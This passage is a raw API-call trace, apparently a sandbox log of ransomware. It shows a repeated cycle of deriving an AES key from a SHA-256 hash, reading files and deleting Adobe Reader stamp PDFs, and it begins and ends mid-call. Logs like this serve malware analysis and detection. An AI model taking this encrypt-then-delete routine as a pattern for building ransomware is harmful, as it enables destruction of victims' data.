CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.873] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\faces.pdf")) returned 1 [0214.875] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.875] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.875] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.875] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.875] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0214.875] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.888] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.888] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.888] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.889] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\pointers.pdf")) returned 1 [0214.890] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.891] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.891] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.891] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.891] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb9dd [0214.891] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.948] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.948] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.948] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.949] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\signhere.pdf")) returned 1 [0214.950] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.951] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.951] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.951] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.951] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0214.951] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.961] CryptDestroyHash (hHash=0x284d768) returned 1 [0214.961] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.961] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.963] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standard.pdf")) returned 1 [0214.965] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.965] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.965] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.965] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.965] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14758 [0214.965] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0214.982] CryptDestroyHash (hHash=0x284d668) returned 1 [0214.982] CryptDestroyKey (hKey=0x284d728) returned 1 [0214.982] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0214.984] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standardbusiness.pdf")) returned 1 [0214.987] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0214.987] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0214.988] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0214.988] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0214.988] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0214.988] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e146 [0214.988] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.016] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.017] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.017] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.017] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\dynamic.pdf")) returned 1 [0215.019] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.020] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.020] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.020] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.020] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0215.020] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.024] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.024] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.024] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.027] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\faces.pdf")) returned 1 [0215.029] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.029] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.029] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.029] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.029] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0215.029] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.046] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.046] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.046] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.047] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\pointers.pdf")) returned 1 [0215.049] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.050] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.050] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.050] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.050] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12fb3 [0215.050] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.055] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.055] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.055] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.057] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\signhere.pdf")) returned 1 [0215.058] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.059] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.059] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.059] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.059] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0215.059] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.071] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.071] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.071] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.073] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\standard.pdf")) returned 1 [0215.075] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.075] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.075] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.075] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.075] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26254 [0215.075] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.107] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.107] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.107] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.108] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\standardbusiness.pdf")) returned 1 [0215.110] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0215.130] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.130] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.130] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.130] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.130] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe7e1 [0215.130] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.143] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.143] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.143] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.145] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\dynamic.pdf")) returned 1 [0215.146] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.147] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.147] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.147] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.147] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9cbb [0215.147] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.174] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.174] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.174] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.175] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\signhere.pdf")) returned 1 [0215.177] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.177] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.177] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.177] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.177] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16f99 [0215.177] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.191] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.191] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.191] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.192] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\standardbusiness.pdf")) returned 1 [0215.194] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0215.295] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.296] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.296] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.296] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.296] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe5af [0215.296] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.301] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.301] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.301] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.302] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\dynamic.pdf")) returned 1 [0215.303] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.304] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.304] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.304] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.304] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6a0 [0215.304] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.481] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.481] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.481] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.483] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf")) returned 1 [0215.484] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.485] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.485] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.485] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.485] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18efb [0215.485] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.502] CryptDestroyHash (hHash=0x284d668) returned 1 [0215.502] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.502] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.504] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf")) returned 1 [0215.507] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0215.507] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.508] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.508] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.508] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.508] GetFileSize (in: hFile=0x674, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe27c [0215.508] ReadFile (in: hFile=0x674, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0215.536] CryptDestroyHash (hHash=0x284d768) returned 1 [0215.536] CryptDestroyKey (hKey=0x284d728) returned 1 [0215.536] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0215.538] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\dynamic.pdf")) returned 1 [0215.540] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0215.540] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0215.540] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0215.540] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0215.540] GetFileSize (in: hFile=0x67c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0215.540] ReadFile (in: hFile=0x67c, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | 